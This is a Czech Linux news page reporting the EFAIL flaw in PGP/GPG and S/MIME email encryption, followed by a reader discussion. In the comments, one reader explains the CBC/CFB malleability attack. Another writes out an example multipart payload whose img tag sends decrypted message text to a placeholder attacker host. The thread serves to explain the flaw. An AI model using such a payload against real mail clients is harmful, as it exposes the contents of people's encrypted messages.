abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×

dnes 20:11 | Zajímavý software

Alexandre Julliard oznámil jménem vývojového týmu Wine vydání první verze 1.0 knihovny vkd3d určené pro překlad volání Direct3D 12 na Vulkan. Zdrojové kódy vkd3d jsou k dispozici pod licencí LGPLv2.1+.

Ladislav Hagara | Komentářů: 1
dnes 19:33 | Komunita

Dnešním dnem lze účet Firefoxu chránit dvoufázovým ověřováním (2FA). Implementován byl standard TOTP (Time-based One-Time Password).

Ladislav Hagara | Komentářů: 0
dnes 15:17 | Pozvánky

Od pátku 25. 5. proběhne na Fakultě informačních technologií ČVUT v Praze openSUSE Conference. Můžete se těšit na spoustu zajímavých přednášek, workshopů a také na Release Party nového openSUSE Leap 15.0. Na stejném místě proběhne v sobotu 26. 5. i seminář o bezpečnosti CryptoFest.

Jendа | Komentářů: 0
dnes 13:33 | Zajímavý software

Drawpile je svobodný multiplatformní program pro kreslení podporující společné kreslení několika uživatelů. Zdrojové kódy jsou k dispozici na GitHubu pod licencí GPLv3+. Drawpile i Drawpile Server jsou ke stažení také ve formátu AppImage. Stačí tedy nastavit právo na spouštění a spustit.

Ladislav Hagara | Komentářů: 0
dnes 09:44 | Zajímavý software

Kalifornskému Muzeu počítačové historie (Computer History Museum) se po pěti letech vyjednávání se společností Qualcomm podařilo získat veškerá práva na poštovního klienta Eudora (Wikipedie), tj. kromě zdrojových kódů muzeum získalo také ochranní známku Eudora nebo domény eudora.com a eudora.org. Po pročištění byly zdrojové kódy Eudory uvolněny pod licencí BSD.

Ladislav Hagara | Komentářů: 3
včera 15:00 | Nová verze

Byla vydána nová stabilní verze 5.11 toolkitu Qt. Přehled novinek v příspěvku na blogu a na wiki stránce. Další dnešní příspěvek na blogu Qt je věnován Qt pro WebAssembly umožňujícímu běh Qt aplikací ve webovém prohlížeči. K vyzkoušení jsou příklady.

Ladislav Hagara | Komentářů: 0
včera 12:22 | Nová verze

Po 7 měsících vývoje od verze 0.12.0 byla vydána verze 0.13.0 hardwarově nenáročného desktopového prostředí LXQt (Lightweight Qt Desktop Environment, Wikipedie) vzniklého sloučením projektů Razor-qt a LXDE. Přehled novinek v oznámení o vydání a v příspěvku ve fóru.

Ladislav Hagara | Komentářů: 14
včera 12:11 | Pozvánky

V úterý 29. května v 18:00 se v Brně koná pátý přednáškový večer o webovém vývoji. Čeká vás povídání o frameworku v Elixiru, vydávání nové kryptoměny přes ICO, component trees v Reactu. Na místě bude lehké občerstvení; vstup zdarma pro registrované. Více informací na Facebooku nebo se rovnou registrujte na Meetup.

dejvik | Komentářů: 0
včera 12:00 | Pozvánky

V pátek 25. května 2018 v Praze proběhne společné setkání komunity kolem Drupalu a překladatelů softwaru – tématem bude právě lokalizace svobodného softwaru (nejen Drupalu). Program začíná v 9.30 v budově Českého rozhlasu (Vinohradská 12), ale můžete přijít i později během dne.

Fluttershy, yay! | Komentářů: 0
včera 06:55 | Zajímavý software

Operační systém 9front, zřejmě nejaktivněji vyvíjený neoficiální fork systému Plan 9 (více informací), se dočkal nové verze nazvané „Ghost in the Minesweeper Shell“. K novým vydáním obvykle dochází každé jeden až tři měsíce.

Fluttershy, yay! | Komentářů: 0
Používáte pro některé služby inetd?
 (34%)
 (23%)
 (43%)
Celkem 148 hlasů
 Komentářů: 5, poslední včera 16:46
    Rozcestník

    Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

    Zítra v 9:00 budou zveřejněny informace o "vážné bezpečnostní chybě" v šifrování pošty pomocí PGP/GPG i S/MIME. EFF (Electronic Frontier Foundation) na svém blogu doporučuje okamžité zakázání automatického dešifrování zpráv nebo raději i odinstalování nástrojů pro dešifrování. Werner Koch, hlavní vývojář GnuPG, i další odborníci považují zprávu za nafouklou bublinu.

    14.5. 11:22 | Ladislav Hagara | Bezpečnostní upozornění


    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    Slavko avatar 14.5. 11:46 Slavko
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Hmm, že by boli CIA, NSA a podobné dobré troj-písmenkové organizácie vážne znepokojené narastajúcim počtom šifrovaných správ?
    Conscript89 avatar 14.5. 12:07 Conscript89 | Brno
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Stejne jako treba FSB, ze? :)
    I can only show you the door. You're the one that has to walk through it.
    Conscript89 avatar 14.5. 12:13 Conscript89 | Brno
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Akorat co se tyka v tomto pripade je to co se tyce NSA, CIA spekulace, narozdil od FSB ktera dala primo "pokyn" zakazat telegram.
    I can only show you the door. You're the one that has to walk through it.
    Slavko avatar 14.5. 15:56 Slavko
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Síce neviem o tom, že by bol akýsi Telegram zakázaný v SR či ČR, ani že by FSB odporúčala okamžite prestať šifrovať, ale inak áno - je to špekulácia, lebo dobré troj-písmenkové organizácie nemajú odvahu urobiť to otvorene, ale získavajú prístup cez nastrčené organizácie, ako napr. súkromné kľúče prostredníctvom metrík Windows...

    Mimochodom, i dobré troj-písmenkové organizácie z USA majú podobný prístup zabezpečený ich federálnym zákonom, ale o tom sa taktne mlčí, pretože mlčanie nie je dezinformácia, že... Alebo ste nečítali veci, ktoré vyšli najavo vďaka zlému Snowdenovi?
    14.5. 21:12 Peter Golis | skóre: 56 | Bratislava
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    To je ten komunista?
    Jendа avatar 14.5. 17:43 Jendа | skóre: 74 | blog: Výlevníček | JO70FB
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Kdyby tohle objevila NSA, tak si to schová jako 0day a nebude to zveřejňovat.
    Tohle (mirror) podporujete.
    Marián Kyral avatar 15.5. 10:58 Marián Kyral | skóre: 29 | blog: Sem_Tam | Frýdek-Místek
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    A myslíš, že o tom ještě neví?
    14.5. 12:08 elenril
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Aha, takže v podstatě je to jen "HTML email je zlo a neměl by se používat", ale "security researchers" kolem toho potřebují udělat cirkus.
    14.5. 14:20 Lyco | skóre: 12 | blog: Lyco
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Protože už jsou k dispozici informace, tak přidávám shrnutí:

    Je to kombinace několika věcí:
    1. mailové čtečky stahují automaticky vzdálený obsah
    2. některé mailové čtečky neberou ohled na bezpečnostní interakce zašifrovaného a nezašifrovaného obsahu: můžu v plaintextu otevřít tag img, do src vložit zašifrovaný obsah (pomocí MIME multipart) a v plaintextu zase img zavřít. Voila: v logu webserveru najdu rozšifrovaný obsah.
    3. I pokud je klient rozumný, dá se udělat útok na kryptografii: používá se neautentizovaný mód CBC (nebo jeho dvojče, CFB). Útočník, pokud správně uhodne plaintext prvního bloku (a to typicky dokáže), může zkonstruovat blok který se rozšifruje na známou hodnotu. Tím vloží do plaintextu tag img a zbytek nechá normálně rozšifrovat jako výše.
    Vysvětlení Odborný článek
    Příspěvek se rázem stává až o 37,5 % pravdivější, je-li pod ním napsáno reálné jméno.
    Jendа avatar 14.5. 17:42 Jendа | skóre: 74 | blog: Výlevníček | JO70FB
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    TL;DR. ELI5: Vyrobíš multipart zprávu s
    <img src="https://útočník/?m=
    ----BOUNDARY
    -----BEGIN PGP MESSAGE-----
    ...
    -----END PGP MESSAGE-----
    ----BOUNDARY
    ">
    Poštovní klient ten vnitřek rozšifruje, sestaví z toho dokument, a pokud povolíš nahrávání vzdálených obrázků (což lze zařídit třeba tím, že tuhle věc přilepíš do newsletteru z Alzy), tak se GETne ten tajný obsah. Nejspíš to selže pokud v šifrované zprávě budou uvozovky.
    Tohle (mirror) podporujete.
    14.5. 20:20 pc2005 | skóre: 36 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Poštovní klient ten vnitřek rozšifruje
    Tak to je facepalm.
    Jendа avatar 14.5. 21:42 Jendа | skóre: 74 | blog: Výlevníček | JO70FB
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Myslíš tím že by klient neměl rozšifrovat zprávu když je jenom částečně šifrovaná? Často totiž nemáš jinou možnost - například různé mailing listy, které přidávají patičky.
    Tohle (mirror) podporujete.
    15.5. 09:54 pc2005 | skóre: 36 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    No dovedu si představit, že by přesunul ten šifrovanej obsah do speciální oblasti a izoloval jí od okolí.
    Josef Kufner avatar 15.5. 10:01 Josef Kufner | skóre: 68
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    V první řadě je prasárna cpát šifrovaný text do plain-text těla mailu. Pokud se dá do samostatné multipart části, tak konference patičku přihodí jako další textovou část a nic se nerozbije (přijde multipart zpráva s dvěma těly - jedno šifrované a druhé nikoliv).
    Hello world ! Segmentation fault (core dumped)
    15.5. 12:56 Lyco | skóre: 12 | blog: Lyco
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Ta chyba je na efail.de popsaná právě pro multipart maily.

    Skutečný problém je v tom, že to klient spojí a interpretuje jako celek, přestože jsou tam hranice (dané šifrováním) které nelze bezpečně překročit.
    Příspěvek se rázem stává až o 37,5 % pravdivější, je-li pod ním napsáno reálné jméno.
    14.5. 17:53 petr
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    at nemusite cekat https://efail.de/efail-attack-paper.pdf

    Založit nové vláknoNahoru


    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.